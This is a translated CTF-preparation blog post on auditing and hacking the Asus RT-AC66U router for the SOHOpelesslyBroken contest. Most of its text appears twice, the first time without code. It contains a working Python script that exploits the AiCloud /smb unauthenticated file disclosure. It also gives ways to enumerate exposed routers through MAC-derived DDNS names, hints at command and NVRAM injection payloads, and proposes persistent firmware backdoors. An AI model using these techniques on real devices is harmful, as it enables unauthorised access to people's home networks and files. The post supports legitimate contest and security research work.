Break open Asus RT-AC66U and prepare for SOHOpelesslyBroken CTF
Finally, July, the time has come to gather at DEFCON. Follow @defconparties on Twitter and determine which places to visit and which reports to go to.
This year there will be a new competition - SOHOpelesslyBroken , from ISE and EFF. The goal of Track 0 is to show previously unknown vulnerabilities in home wireless routers. Track 1 will be held in CTF mode right during DEFCON. CTFs are always very funny, and specifically this one involves breaking into real iron, which is doubly fun!
Yeah, this is my workplace = P
')
I am very interested in the EFF Open Wireless Router (translator, by the way, too), but they still don’t tell anything about the device. The competition rules include ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] as a possible hacking device. I have an extra RT-AC66U at home, so I decided to write a small tutorial for all participants inthe CTF competition
First of all, you need to find the firmware and its source code. Fortunately, Asus RT-AC66U is licensed under the GPL, and it is easy to find the source code of the firmware on the Internet. The version used in the CTF is old, from 2012. To analyze the firmware better, we will take the firmware and source code versions from v3.0.0.4.266 to v3.0.0.376.1123 (the latest version at the time of this writing):
Asus RT-AC66u v3.0.0.4.266 - firmware
Asus RT-AC66u v3.0.0.4.266 - source code
Asus RT-AC66u v3.0.0.4.376.1123 - firmware
Asus RT-AC66u v3.0.0.4.376.1123 - source code
A number of firmware upgrades have been released between the two versions, so we’ll see a history of their changes:
www.asus.com/Networking/RTAC66U/HelpDesk_Download
According to the rules of the competition, we must detect and exploit a 0-day vulnerability. You can connect several different vulnerabilities to score more points. If the vendor patched a vulnerability without reporting it, and you were able to exploit it, then it will still be considered a 0-day vulnerability (let's not discuss the terminology).
So, we have the source code, it's time to unpack and examine it. The CTF Field Guide from Trail of Bits contains good resources for source code auditing . You can use utilities like Beyond Compare , Araxis Merge and WinMerge under Windows, or Meld if you are using Linux.
We will work with the "/ asuswrt / release / src / router /" directory. Compare the two versions via Meld:
This router already has many vulnerabilities found. If you want to find a 0-day, you need to make sure that the vulnerability is not found before you (and believe me, this is the hardest part). As an example:
Some points will be taken from you if your exploits require special system configuration or special information. So, if you want to score a lot of points, you should aim at the standard configuration of services and processes.
In the “USB Applications” tab in RT-AC66U, you can configure some services, such as FTP, DLNA, NFS, and Samba.
MiniDLNA is also a great target. It is easy to find vulnerabilities in it using Zachary Cutlip 's research , because he broke this program several times.
Another potentially vulnerable service is AiCloud - it connects your home network to the online storage and gives access from a mobile device:
While part of the command examines the source code, forensics specialists will unpack the firmware using binwalk and fmk:
You can remember binwally , a utility I wrote to find the difference between two binary trees using fuzzy hashing . Binwalk has its own option for fuzzy hashing between files and directories.
Most manufacturers (like Asus) do not open the entire code. You will probably have to reverse the drivers and binaries to find a good vulnerability. The binary named “ACSD” is most interesting because it was removed from newer firmware versions (v3.0.0.4.374.130 +) due to a vulnerability found by Jacob Holcomb .
Binary for MIPS Little Endian.
Also, it is important to find out more about the file system. The OpenWRT Wiki has a great article about flash markup . MTD in Linux gives access to flash devices and allows you to create full-fledged file systems on them. You can go ssh to the device and see the markup:
The NVRAM section is very valuable to us, it stores all the device settings. You can view its content just by scaling you need a partition (mtd1) or by running the nvram show command:
Pmon is another interesting section. It contains LZMA compressed data that the bootloader uses to restore the firmware when the update fails.
Time to start hacking something. We need utilities like gdb, gdbserver and strace to start debugging binaries. We can either cross-compile them, or configure Optware / Entware and install the assembled packages.
Wanduck (GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router / rc / wanduck.c) is quite an interesting process to analyze. It runs by default, and will raise the pseudo-HTTP server on port 18017. This HTTP server redirects every request to the main interface and, for some reason, drops all requests that end in ".ico".
Let's see why it does this — run gdbserver remotely (gdbserver --multi localhost: 12345 &) and connect with any debugger of your choice. If you are using IDA Pro, open the binary and set the processor type to “mipsrl”.
Find the function handle_http_req and set a breakpoint on the dst_url comparison:
Enter the host and port gdbserver in the Debugger / Process Options menu and join the desired PID.
Continue the process (F9) and execute the HTTP request at 192.168.1.1/x.ico . The debugger stops at a given breakpoint and you can see the registers and memory.
If you want to find other targets for research, search for them in the “prebuilt” directory inside “GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router /”. Some interesting binaries:
Mobile application AiCloud can reveal more interesting information about the operation of the device. If you disable the APK, or use the intercept proxy, you can get the initial HTTP request for the application:
Notice the strange parameter ddns_hostname? Problem on cryptography =) (the translator does not think so).
A POST request tries to register a new Dynamic DNS address to the device using the asuscomm.com service. If we look for this line in the source code of RT-AC66U, then we can easily find a function that generates the DDNS address:
According to information from WikiDev , RT-AC66U uses the following organization identifiers in MAC addresses:
Using this information, we can match the IP address of each router using AiCloud. Just generate a list of all possible MAC addresses and sort out the DNS names with a mubix trick .
If you are too lazy to run a command, you can search “asuscomm.com” on Shodan .
AiCloud works by default on ports 8082 and 443. The fact that anyone can easily get a list of routers that have this service running should be a concern, right?
Another interesting cryptographic warm-up can be a parsing algorithm for generating a WPS PIN device. You can get the current PIN and secret_code by running the nvram show | grep -E secret_code | wps_device_pin ". Look for these values ​​in the source code and use the resulting information to write keygens (and do not forget to add chiptune from pouet.net ).
You can also check the entropy of the keys generated on the device. Look at the “Fast Internet-wide Scanning and its Security Applications” slides for a couple of ideas.
There are so many techniques for testing web penetrations that I will focus only on a couple of them. The router interface has no protection against CSRF. There is also a traditional inject in the ping team and a bunch of XSS vectors.
HTTP daemon based on microhttpd. There is a basic protection against leaving the directory in httpd.c:
We can shamelessly sneak in on the idea of hackerfantastic and test potential protection bypass :
There are some MIME handlers in the web server that “should have been removed”
The file get_webdavInfo.asp is accessible without authentication and displays a large amount of important information about the device and network:
We can change the values ​​of variables in nvram to install the XSS backdoor on this page, for example:
Some operations use the nvram_get and nvram_safe_get functions. Settings, it happens, are saved through the function nvram_set. If the router does not screen the data that it receives from NVRAM, then you can do something like NVRAM injection (% 0A,% 0D and `reboot` will always be your helpers in this matter).
AiCloud is a very vulnerable service that can be easily operated . As soon as you activate it in the settings, lighttpd is launched on the router on port 8082 (or 443 on new firmware versions) and offers to give access to your files online. The joke is that the login and password input dialog can be bypassed by adding / smb / to the URL (read the source!)
I wrote a small script for using this bug in AiCloud on RT-AC66U v3.0.0.4.266. It receives all files and paths on the router, including from USB devices.
And finally, do not forget to compare the difference in the files in the directory www. Along this path are all the components and scripts that are used in the web interface.
Why not try to open the lid of the router without damaging the warranty seal? For this, you will need advice from the guys from DEFCON Tamber Evident Village .
Hacking Asus RT-AC66U is a great exercise for newbies in hacking routers. Most of the source code is freely available, and you can find a bunch of exploits and vulnerability descriptions for it. You might not have noticed, but we tested every item from the OWASP Internet of Things Top 10 . Rumor has it that this router will be part of the basic part of the OWASP IoT Webgoat and Damn Vulnerable Embedded Linux.
Here are a couple of approaches that can give you extra points in the competition:
There are a lot of things that I want to write about, but hold them for the next posts. If you intend to participate in SOHOpelessly Broken CTF and found this article useful, you can kick me at any time and drink coffee with me during DEFCON / BsidesLV / Blackhat =)
This year there will be a new competition - SOHOpelesslyBroken , from ISE and EFF. The goal of Track 0 is to show previously unknown vulnerabilities in home wireless routers. Track 1 will be held in CTF mode right during DEFCON. CTFs are always very funny, and specifically this one involves breaking into real iron, which is doubly fun!
Yeah, this is my workplace = P
')
I am very interested in the EFF Open Wireless Router (translator, by the way, too), but they still don’t tell anything about the device. The competition rules include ASUS RT-AC66U (HW Ver. A2) [Version 3.0.0.4.266] as a possible hacking device. I have an extra RT-AC66U at home, so I decided to write a small tutorial for all participants in
Intelligence service
First of all, you need to find the firmware and its source code. Fortunately, Asus RT-AC66U is licensed under the GPL, and it is easy to find the source code of the firmware on the Internet. The version used in the CTF is old, from 2012. To analyze the firmware better, we will take the firmware and source code versions from v3.0.0.4.266 to v3.0.0.376.1123 (the latest version at the time of this writing):
Asus RT-AC66u v3.0.0.4.266 - firmware
Asus RT-AC66u v3.0.0.4.266 - source code
Asus RT-AC66u v3.0.0.4.376.1123 - firmware
Asus RT-AC66u v3.0.0.4.376.1123 - source code
A number of firmware upgrades have been released between the two versions, so we’ll see a history of their changes:
www.asus.com/Networking/RTAC66U/HelpDesk_Download
According to the rules of the competition, we must detect and exploit a 0-day vulnerability. You can connect several different vulnerabilities to score more points. If the vendor patched a vulnerability without reporting it, and you were able to exploit it, then it will still be considered a 0-day vulnerability (let's not discuss the terminology).
So, we have the source code, it's time to unpack and examine it. The CTF Field Guide from Trail of Bits contains good resources for source code auditing . You can use utilities like Beyond Compare , Araxis Merge and WinMerge under Windows, or Meld if you are using Linux.
We will work with the "/ asuswrt / release / src / router /" directory. Compare the two versions via Meld:
This router already has many vulnerabilities found. If you want to find a 0-day, you need to make sure that the vulnerability is not found before you (and believe me, this is the hardest part). As an example:
- ASUS RT-AC66U Remote Root (Broadcom ACSD)
- ASUS RT-N66U Router - HTTPS directory traversal disclosure
- Asus RT56U Remote Command Injection
- Taking over the ASUS RT-N56U and RT-AC66U
- Dear Asus router user: You've been pwned, thanks to easily exploited flaw (Asusgate)
- OSVDB
Some points will be taken from you if your exploits require special system configuration or special information. So, if you want to score a lot of points, you should aim at the standard configuration of services and processes.
In the “USB Applications” tab in RT-AC66U, you can configure some services, such as FTP, DLNA, NFS, and Samba.
MiniDLNA is also a great target. It is easy to find vulnerabilities in it using Zachary Cutlip 's research , because he broke this program several times.
Another potentially vulnerable service is AiCloud - it connects your home network to the online storage and gives access from a mobile device:
Forensic
While part of the command examines the source code, forensics specialists will unpack the firmware using binwalk and fmk:
You can remember binwally , a utility I wrote to find the difference between two binary trees using fuzzy hashing . Binwalk has its own option for fuzzy hashing between files and directories.
Most manufacturers (like Asus) do not open the entire code. You will probably have to reverse the drivers and binaries to find a good vulnerability. The binary named “ACSD” is most interesting because it was removed from newer firmware versions (v3.0.0.4.374.130 +) due to a vulnerability found by Jacob Holcomb .
Binary for MIPS Little Endian.
Also, it is important to find out more about the file system. The OpenWRT Wiki has a great article about flash markup . MTD in Linux gives access to flash devices and allows you to create full-fledged file systems on them. You can go ssh to the device and see the markup:
The NVRAM section is very valuable to us, it stores all the device settings. You can view its content just by scaling you need a partition (mtd1) or by running the nvram show command:
Pmon is another interesting section. It contains LZMA compressed data that the bootloader uses to restore the firmware when the update fails.
Breaking into
Time to start hacking something. We need utilities like gdb, gdbserver and strace to start debugging binaries. We can either cross-compile them, or configure Optware / Entware and install the assembled packages.
Wanduck (GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router / rc / wanduck.c) is quite an interesting process to analyze. It runs by default, and will raise the pseudo-HTTP server on port 18017. This HTTP server redirects every request to the main interface and, for some reason, drops all requests that end in ".ico".
Let's see why it does this — run gdbserver remotely (gdbserver --multi localhost: 12345 &) and connect with any debugger of your choice. If you are using IDA Pro, open the binary and set the processor type to “mipsrl”.
Find the function handle_http_req and set a breakpoint on the dst_url comparison:
Enter the host and port gdbserver in the Debugger / Process Options menu and join the desired PID.
Continue the process (F9) and execute the HTTP request at 192.168.1.1/x.ico . The debugger stops at a given breakpoint and you can see the registers and memory.
If you want to find other targets for research, search for them in the “prebuilt” directory inside “GPL_RT_AC66U_VER3004266 / asuswrt / release / src / router /”. Some interesting binaries:
- / acsd / prebuilt / acsd
- / webdav_client / prebuilt / webdav_client
- / asuswebstorage / prebuilt / asuswebstorage
- / eapd / linux / prebuilt / eapd
- / nas / nas / prebuilt / nas
- / flash / prebuilt / flash
- / et / prebuilt / et
- / wps / prebuilt / wps_monitor
- / ated / prebuilt / ated
- / wlconf / prebuilt / wlconf
Mobile application AiCloud can reveal more interesting information about the operation of the device. If you disable the APK, or use the intercept proxy, you can get the initial HTTP request for the application:
Notice the strange parameter ddns_hostname? Problem on cryptography =) (the translator does not think so).
Cryptography
A POST request tries to register a new Dynamic DNS address to the device using the asuscomm.com service. If we look for this line in the source code of RT-AC66U, then we can easily find a function that generates the DDNS address:
var isMD5DDNSName = function(){ var macAddr = '<% nvram_get("lan_hwaddr"); %>'.toUpperCase().replace(/:/g, ""); return "A"+hexMD5(macAddr).toUpperCase()+".asuscomm.com"; } According to information from WikiDev , RT-AC66U uses the following organization identifiers in MAC addresses:
- 08: 60: 6E (1 E, 1 W, 2011)
- 10: BF: 48 (1 E, 2 W, 2011)
- 30: 85: A9 (3 E, 3 W, 2011)
- 50: 46: 5D (1 E, 2 W, 2012)
Using this information, we can match the IP address of each router using AiCloud. Just generate a list of all possible MAC addresses and sort out the DNS names with a mubix trick .
If you are too lazy to run a command, you can search “asuscomm.com” on Shodan .
AiCloud works by default on ports 8082 and 443. The fact that anyone can easily get a list of routers that have this service running should be a concern, right?
Another interesting cryptographic warm-up can be a parsing algorithm for generating a WPS PIN device. You can get the current PIN and secret_code by running the nvram show | grep -E secret_code | wps_device_pin ". Look for these values ​​in the source code and use the resulting information to write keygens (and do not forget to add chiptune from pouet.net ).
You can also check the entropy of the keys generated on the device. Look at the “Fast Internet-wide Scanning and its Security Applications” slides for a couple of ideas.
Web
There are so many techniques for testing web penetrations that I will focus only on a couple of them. The router interface has no protection against CSRF. There is also a traditional inject in the ping team and a bunch of XSS vectors.
HTTP daemon based on microhttpd. There is a basic protection against leaving the directory in httpd.c:
We can shamelessly sneak in on the idea of hackerfantastic and test potential protection bypass :
#include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ char *file; int len; file = argv[1]; len = strlen(file); if ( file[0] == '/' || strcmp( file, ".." ) == 0 || strncmp( file, "../", 3 ) == 0 || strstr( file, "/../" ) != (char*) 0 || strcmp( &(file[len-3]), "/.." ) == 0 ) { printf ("Illegal filename: %s\n", file); } else { printf ("Accepted filename: %s\n", file); } return 0; } There are some MIME handlers in the web server that “should have been removed”
// some should be removed struct except_mime_handler except_mime_handlers[] = { { "QIS_*", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "qis/*", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "*.css", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "state.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "detect.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "popup.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "general.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "help.js", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "start_autodet.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "start_apply.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "start_apply2.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "setting_lan.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "httpd_check.htm", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "status.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "automac.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "detecWAN.asp", MIME_EXCEPTION_NORESETTIME}, { "detecWAN2.asp", MIME_EXCEPTION_NORESETTIME}, { "WPS_info.asp", MIME_EXCEPTION_NORESETTIME}, { "WAN_info.asp", MIME_EXCEPTION_NOAUTH_ALL|MIME_EXCEPTION_NORESETTIME}, { "result_of_get_changed_status.asp", MIME_EXCEPTION_NORESETTIME}, { "result_of_get_changed_status_QIS.asp", MIME_EXCEPTION_NOAUTH_FIRST|MIME_EXCEPTION_NORESETTIME}, { "result_of_detect_client.asp", MIME_EXCEPTION_NORESETTIME}, { "Nologin.asp", MIME_EXCEPTION_NOAUTH_ALL}, { "alertImg.gif", MIME_EXCEPTION_NOAUTH_ALL}, { "error_page.htm", MIME_EXCEPTION_NOAUTH_ALL}, { "jquery.js", MIME_EXCEPTION_NOAUTH_ALL}, { "gotoHomePage.htm", MIME_EXCEPTION_NOAUTH_ALL}, { "update_appstate.asp", MIME_EXCEPTION_NOAUTH_ALL}, { "update_cloudstatus.asp", MIME_EXCEPTION_NOAUTH_ALL}, { "get_webdavInfo.asp", MIME_EXCEPTION_NOAUTH_ALL}, { "*.gz", MIME_EXCEPTION_NOAUTH_ALL}, { "*.tgz", MIME_EXCEPTION_NOAUTH_ALL}, { "*.zip", MIME_EXCEPTION_NOAUTH_ALL}, { "*.ipk", MIME_EXCEPTION_NOAUTH_ALL}, { NULL, 0 } }; The file get_webdavInfo.asp is accessible without authentication and displays a large amount of important information about the device and network:
We can change the values ​​of variables in nvram to install the XSS backdoor on this page, for example:
Some operations use the nvram_get and nvram_safe_get functions. Settings, it happens, are saved through the function nvram_set. If the router does not screen the data that it receives from NVRAM, then you can do something like NVRAM injection (% 0A,% 0D and `reboot` will always be your helpers in this matter).
AiCloud is a very vulnerable service that can be easily operated . As soon as you activate it in the settings, lighttpd is launched on the router on port 8082 (or 443 on new firmware versions) and offers to give access to your files online. The joke is that the login and password input dialog can be bypassed by adding / smb / to the URL (read the source!)
I wrote a small script for using this bug in AiCloud on RT-AC66U v3.0.0.4.266. It receives all files and paths on the router, including from USB devices.
#!/usr/bin/python from bs4 import BeautifulSoup import urllib2 import sys def list_dir(url, start_dir): try: html_page = urllib2.urlopen(url+start_dir) except urllib2.HTTPError as e: print e sys.exit(1) soup = BeautifulSoup(html_page) for link in soup.findAll('a'): path = link.get('uhref') if path != '../': is_dir = link.get('isdir') if is_dir == str('1'): print url+path list_dir(url,path) else: print url+path nargs = len(sys.argv) if nargs == 2: url = sys.argv[1] start_dir = "/smb" elif nargs == 3: url = sys.argv[1] start_dir = str(sys.argv[2]) else: print 'Asus RT-AC66U AiCloud Unauthenticated File Disclosure\ \nTested Firmwares: 3.0.0.4.266, 3.0.0.4.270 and 3.0.0.4.354\ \nDisclosed by Kyle Lovett\ \nScript by Bernardo Rodrigues - http://w00tsec.blogspot.com\ \nUsage: python %s http://url [path]' % sys.argv[0] sys.exit(1) list_dir(url, start_dir) And finally, do not forget to compare the difference in the files in the directory www. Along this path are all the components and scripts that are used in the web interface.
Bonus
Why not try to open the lid of the router without damaging the warranty seal? For this, you will need advice from the guys from DEFCON Tamber Evident Village .
Other (sort of conclusion)
Hacking Asus RT-AC66U is a great exercise for newbies in hacking routers. Most of the source code is freely available, and you can find a bunch of exploits and vulnerability descriptions for it. You might not have noticed, but we tested every item from the OWASP Internet of Things Top 10 . Rumor has it that this router will be part of the basic part of the OWASP IoT Webgoat and Damn Vulnerable Embedded Linux.
Here are a couple of approaches that can give you extra points in the competition:
- Overwriting bootloader code and creating dual-boot with backdoor
- Adding backdoor to the firmware so that it is not removed when updating the firmware
- Paint the router remotely
- Reprogramming the LED on the game in PONG
There are a lot of things that I want to write about, but hold them for the next posts. If you intend to participate in SOHOpelessly Broken CTF and found this article useful, you can kick me at any time and drink coffee with me during DEFCON / BsidesLV / Blackhat =)
Source: https://habr.com/ru/post/230469/
All Articles